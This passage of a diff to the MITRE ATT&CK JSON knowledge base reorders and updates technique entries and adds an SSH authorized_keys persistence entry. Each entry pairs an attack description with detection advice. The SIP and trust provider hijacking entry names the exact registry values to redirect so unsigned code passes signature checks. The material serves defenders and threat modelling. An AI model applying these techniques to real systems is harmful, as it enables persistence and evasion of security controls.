"modified": "2020-03-26T21:49:31.964Z",
"created": "2020-02-18T18:34:49.414Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Alain Homewood, Insomnia Security",
+ "Vincent Le Toux"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
"x_mitre_data_sources": [
"Windows event logs",
"Authentication logs",
"API monitoring"
],
- "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Alain Homewood, Insomnia Security",
- "Vincent Le Toux"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -22752,7 +23579,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "SIP and Trust Provider Hijacking",
- "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application whitelisting tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
+ "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
"id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -22761,14 +23588,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T13:19:38.506Z",
+ "modified": "2020-06-20T22:42:26.022Z",
"created": "2020-02-05T19:34:04.910Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
- "x_mitre_contributors": [
- "Matt Graeber, @mattifestation, SpecterOps"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Autoruns Analysis",
+ "Digital Certificate Validation",
+ "User Mode Signature Validation"
],
+ "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
"x_mitre_data_sources": [
"Windows Registry",
"API monitoring",
@@ -22779,22 +23613,30 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Autoruns Analysis",
- "Digital Certificate Validation",
- "Process whitelisting",
- "User Mode Signature Validation"
+ "x_mitre_contributors": [
+ "Matt Graeber, @mattifestation, SpecterOps"
],
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2020-02-11T18:25:28.212Z",
+ "modified": "2020-03-23T21:16:02.812Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
+ "name": "SMB/Windows Admin Shares",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22837,22 +23679,6 @@
"source_name": "Medium Detecting WMI Persistence"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "SMB/Windows Admin Shares",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
- "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-23T21:16:02.812Z",
- "created": "2020-02-11T18:25:28.212Z",
"x_mitre_platforms": [
"Windows"
],
@@ -22922,25 +23748,25 @@
],
"modified": "2020-03-25T23:30:20.638Z",
"created": "2019-12-12T14:59:58.168Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
+ "x_mitre_data_sources": [
+ "Application logs"
],
- "x_mitre_contributors": [
- "Carlos Borges, @huntingneo, CIP",
- "Lucas da Silva Pereira, @vulcanunsec, CIP",
- "Kaspersky"
- ],
- "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Application logs"
+ "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+ "x_mitre_contributors": [
+ "Carlos Borges, @huntingneo, CIP",
+ "Lucas da Silva Pereira, @vulcanunsec, CIP",
+ "Kaspersky"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
]
},
{
@@ -22977,21 +23803,80 @@
],
"modified": "2020-03-23T23:43:46.977Z",
"created": "2020-02-11T18:27:15.774Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_system_requirements": [
+ "An SSH server is configured and running."
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
"x_mitre_data_sources": [
"Authentication logs",
"Process use of network",
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_system_requirements": [
- "An SSH server is configured and running."
+ "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1098.004",
+ "url": "https://attack.mitre.org/techniques/T1098/004"
+ },
+ {
+ "source_name": "SSH Authorized Keys",
+ "url": "https://www.ssh.com/ssh/authorized_keys/",
+ "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Venafi SSH Key Abuse",
+ "url": "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities",
+ "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Cybereason Linux Exim Worm",
+ "url": "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability",
+ "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "SSH Authorized Keys",
+ "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value \u201cyes\u201d to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)",
+ "id": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "modified": "2020-06-25T16:32:23.367Z",
+ "created": "2020-06-24T12:42:35.144Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
]
},
{
@@ -23073,24 +23958,24 @@
],
"modified": "2020-03-23T23:11:24.682Z",
"created": "2020-02-25T18:34:38.290Z",
- "x_mitre_contributors": [
- "Anastasios Pingios"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
+ "x_mitre_system_requirements": [
+ "SSH service enabled, trust relationships configured, established connections"
],
"x_mitre_data_sources": [
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "SSH service enabled, trust relationships configured, established connections"
- ],
- "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "root"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_contributors": [
+ "Anastasios Pingios"
]
},
{
@@ -23150,22 +24035,22 @@
],
"modified": "2020-03-24T13:45:03.730Z",
"created": "2019-11-27T14:58:00.429Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Windows event logs"
],
- "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -23209,37 +24094,37 @@
],
"modified": "2020-03-24T13:45:04.006Z",
"created": "2017-05-31T21:30:46.977Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_effective_permissions": [
- "SYSTEM",
- "Administrator",
- "User"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters",
- "Windows event logs"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_contributors": [
"Prashant Verma, Paladion",
"Leo Loobeek, @leoloobeek",
"Travis Smith, Tripwire",
"Alain Homewood, Insomnia Security"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_effective_permissions": [
+ "SYSTEM",
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
@@ -23265,20 +24150,20 @@
],
"modified": "2020-03-28T00:26:48.769Z",
"created": "2017-05-31T21:30:34.139Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Process use of network",
- "Process monitoring"
